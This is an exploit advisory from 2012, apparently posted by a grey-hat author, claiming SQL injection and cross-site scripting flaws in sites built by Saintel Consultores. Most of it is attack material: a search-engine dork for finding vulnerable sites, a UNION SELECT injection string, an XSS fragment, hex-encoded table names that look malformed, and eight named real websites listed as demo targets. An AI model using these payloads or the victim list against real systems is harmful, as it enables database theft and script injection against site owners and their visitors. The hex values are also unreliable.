_ _ _____ ___ ____ ___ _____ _____ __ | | | | __ \ / _ \| _ \ / _ \| __ \ / _ \ \ / / | | | | |__) | | | | |_) | | | | |__) | | | \ V / | | | | _ /| | | | _ <| | | | _ /| | | |> < | |__| | | \ \| |_| | |_) | |_| | | \ \| |_| / . \ \____/|_| \_\\___/|____/ \___/|_| \_\\___/_/ \_\ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= INDEPENDENT SECURITY RESEARCHER PENETRATION TESTING SECURITY -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Author: Ur0b0r0x # Tiwtte: @Ur0b0r0x # Email: ur0b0r0x_4n1@live.com # Line: GreyHat # Exploit Title: Saintel Consultores - SQL Injection/Cross-Site Scripting Vulnerabilities # Dork: intext:"Concepto Web: Saintel Consultores" # Date: 06/11/2012 # Author: Ur0b0r0x # Url Vendor: http://www.saintelconsultores.com/ # Vendor Name: Saintel Consultores # Tested On: Backtrack R3 / Linux Mint # Type: php ------------------- Agreement -------------------- [02/11/2012] - Vulnerability discovered [05/11/2012] - Vendor notified Dont responsed [06/11/2012] - Public disclosure -------------------------------------------------- # Expl0it/P0c ################### http://site.com/*.*.php?id= < Sql Vulnerability Path > http://site.com/*.*.php?id= < Xss Vulnerability Path > # Exploit/Comand/Sql=> +union+select+1,2,3,4,5,6,7,8,9,10,11,12--+ # Exploit/Comand/Xss=> "> # Payload/Comand/Sql=> table_schema=0x46173645F626736C6574657273 / table_name=0x6E65771736573616C616 # Demo_Xss_Sql_Vulnerabilities http://movil.orocolor.com.ve/tecnica.php?id=1' http://www.cosmoguayana.com.ve/noticia.php?id=1' http://www.exitoyvalores.com/galeria_canales.php?id=1' http://www.metroparksuites.com/espanol/detalle_producto.php?id=1' http://movil.nuevaprensa.com.ve/seccion.php?secc=1' http://www.grupoti.com/noticias.php?id=1' http://www.mercadeoemail.com/galeria.php?cliente=1' http://www.inprovit.com/es/imprimir_producto.php?id=1' # Gr3t'x ######################### >> | Mr.Pack | Nick Nitrous | Revolution_Hackers | Dylan Irzi | R00tc0d3r's | SecurityDev | Mafia Dz | Algerian Hacker | >> And All H4x0r5